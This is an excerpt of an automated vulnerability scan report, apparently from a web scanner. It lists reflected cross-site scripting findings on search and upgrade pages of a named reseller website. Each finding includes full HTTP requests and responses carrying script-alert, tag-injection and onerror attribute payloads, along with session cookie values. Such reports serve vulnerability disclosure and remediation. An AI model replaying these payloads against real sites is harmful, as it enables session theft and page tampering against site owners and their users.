This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes414b0<script>alert(1)</script>c9d2b7cfb5f/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes414b0<script>alert(1)</script>c9d2b7cfb5f/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4896. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 69bff<script>alert(1)</script>f3efec7d1b9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos69bff<script>alert(1)</script>f3efec7d1b9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos69bff<script>alert(1)</script>f3efec7d1b9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4897. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload fc1ce<script>alert(1)</script>f78da651956 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/search.phpfc1ce<script>alert(1)</script>f78da651956?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/search.phpfc1ce<script>alert(1)</script>f78da651956?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4898. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload cc25f<a>201ab26538d was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Searchcc25f<a>201ab26538d&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Searchcc25f<a>201ab26538d&opt=2 was not found on this server.</p>
...[SNIP]...

2.4899. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload efc7f<a>e3ffb159616 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/search.php?keyword=search...efc7f<a>e3ffb159616&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/search.php?keyword=search...efc7f<a>e3ffb159616&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4900. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7e260<script>alert(1)</script>f055ca956ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&7e260<script>alert(1)</script>f055ca956ed=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&7e260<script>alert(1)</script>f055ca956ed=1 was not found on this server.</p>
...[SNIP]...

2.4901. http://www.resellerbase.com/travel-vaccation/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 8748c<a>8638b49a3e was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=28748c<a>8638b49a3e HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=28748c<a>8638b49a3e was not found on this server.</p>
...[SNIP]...

2.4902. http://www.resellerbase.com/travel-vaccation/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e184e<script>alert(1)</script>604afe0a35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccatione184e<script>alert(1)</script>604afe0a35/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:17 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccatione184e<script>alert(1)</script>604afe0a35/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4903. http://www.resellerbase.com/travel-vaccation/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 782a5<script>alert(1)</script>bdeaafb3c70 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes782a5<script>alert(1)</script>bdeaafb3c70/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes782a5<script>alert(1)</script>bdeaafb3c70/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4904. http://www.resellerbase.com/travel-vaccation/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9b152<script>alert(1)</script>f5aefec7db7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/search.php9b152<script>alert(1)</script>f5aefec7db7?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/search.php9b152<script>alert(1)</script>f5aefec7db7?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4905. http://www.resellerbase.com/travel-vaccation/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 3ec8f<a>44a2069f259 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search3ec8f<a>44a2069f259&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search3ec8f<a>44a2069f259&opt=2 was not found on this server.</p>
...[SNIP]...

2.4906. http://www.resellerbase.com/travel-vaccation/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 1caad<a>5c3b115ee0a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/search.php?keyword=search...1caad<a>5c3b115ee0a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/search.php?keyword=search...1caad<a>5c3b115ee0a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.4907. http://www.resellerbase.com/travel-vaccation/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload fc54d<script>alert(1)</script>47a5c261271 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search&opt=2&fc54d<script>alert(1)</script>47a5c261271=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:43:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search&opt=2&fc54d<script>alert(1)</script>47a5c261271=1 was not found on this server.</p>
...[SNIP]...

2.4908. http://www.resellerbase.com/travel-vaccation/themes/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/travel-vaccation/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 9fb79<a>4b9809e0be2 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search&opt=29fb79<a>4b9809e0be2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/travel-vaccation/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:42:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /travel-vaccation/themes/search.php?keyword=search...&Submit3=Search&opt=29fb79<a>4b9809e0be2 was not found on this server.</p>
...[SNIP]...

2.4909. http://www.resellerbase.com/upgrade.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/upgrade.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9d1ce<script>alert(1)</script>9bd0c6c5f55caf8f2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /upgrade.php9d1ce<script>alert(1)</script>9bd0c6c5f55caf8f2?query=555-555-0199@example.com&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/upgrade.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /upgrade.php9d1ce<script>alert(1)</script>9bd0c6c5f55caf8f2?query=555-555-0199@example.com&pflag=search&submit=Search was not found on this server.</p>
...[SNIP]...

2.4910. http://www.resellerbase.com/upgrade.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/upgrade.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c6842<script>alert(1)</script>155f1982ac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /upgrade.phpc6842<script>alert(1)</script>155f1982ac HTTP/1.1
Accept: */*
Referer: http://www.resellerbase.com/add.php
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Accept-Encoding: gzip, deflate
Host: www.resellerbase.com
Proxy-Connection: Keep-Alive
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8237

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /upgrade.phpc6842<script>alert(1)</script>155f1982ac was not found on this server.</p>
...[SNIP]...

2.4911. http://www.resellerbase.com/upgrade.php [id parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/upgrade.php

Issue detail

The value of the id request parameter is copied into the HTML document as plain text between tags. The payload 45ec5<a>0e8f9f0d956 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /upgrade.php?id=45ec5<a>0e8f9f0d956&pflag=retrieve&submit=Submit HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/upgrade.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11722

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Upgrade a Listing</t
...[SNIP]...
<td>45ec5<a>0e8f9f0d956</td>
...[SNIP]...

2.4912. http://www.resellerbase.com/upgrade.php [query parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/upgrade.php

Issue detail

The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff82c"><img%20src%3da%20onerror%3dalert(1)>4c8b983d952d7c632 was submitted in the query parameter. This input was echoed as ff82c\"><img src=a onerror=alert(1)>4c8b983d952d7c632 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /upgrade.php?query=555-555-0199@example.comff82c"><img%20src%3da%20onerror%3dalert(1)>4c8b983d952d7c632&pflag=search&submit=Search HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Referer: http://www.resellerbase.com/upgrade.php
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.1 200 OK
Date: Wed, 17 Nov 2010 23:01:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 8294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Search result: 555-5
...[SNIP]...
<input type="text" name="keyword" size="20"

value="555-555-0199@example.comff82c\"><img src=a onerror=alert(1)>4c8b983d952d7c632"
/>
